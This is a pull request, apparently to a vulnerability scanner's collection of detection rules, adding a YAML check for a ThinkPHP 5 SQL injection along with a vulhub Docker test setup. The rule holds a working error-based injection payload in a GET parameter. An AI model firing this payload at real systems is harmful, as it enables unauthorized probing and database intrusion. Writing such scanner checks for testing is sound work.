### PR TITLE
add thinkphp5-sql-injection poc

### DIFF
--- a/pocs/poc-yaml-thinkphp5-sql-injection.yml
+++ b/pocs/poc-yaml-thinkphp5-sql-injection.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-thinkphp5-sql-injection
+rules:
+  - method: GET
+    path: '/index.php?ids[0,updatexml(0,concat(0xa,md5(89)),0)]=1'
+    follow_redirects: true
+    expression: |
+      status==200 && body.bcontains(b'7647966b7343c29048673252e490f73')
+detail:
+  author: ResidualLaugh(https://github.com/ResidualLaugh)
+  links: 
+    - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection


### PR DESCRIPTION
请先本在 repo 中搜索相关信息，确保该 poc 没有被提交过。
没有
然后阅读 https://chaitin.github.io/xray/#/guide/contribute

如果你的 poc 符合以上要求，请填写下列信息

## 本 poc 是干什么的
thinkphp5-sql-injection的poc
## 测试环境
https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection

docker-compose.yml:

version: '2'
services:
 web:
   image: vulhub/thinkphp:5.0.9
   depends_on:
    - mysql
   ports:
    - "80:80"
   volumes:
    - ./www/controller:/var/www/application/index/controller
    - ./www/model:/var/www/application/index/model
    - ./www/database.php:/var/www/application/database.php
 mysql:
   image: mysql:5.5
   environment: 
    - MYSQL_ROOT_PASSWORD=root
    - MYSQL_DATABASE=cat
   volumes:
    - ./www/init.sql:/docker-entrypoint-initdb.d/init.sqllocalhost:in-sqlinjection

## 备注
参与一下，看看怎么样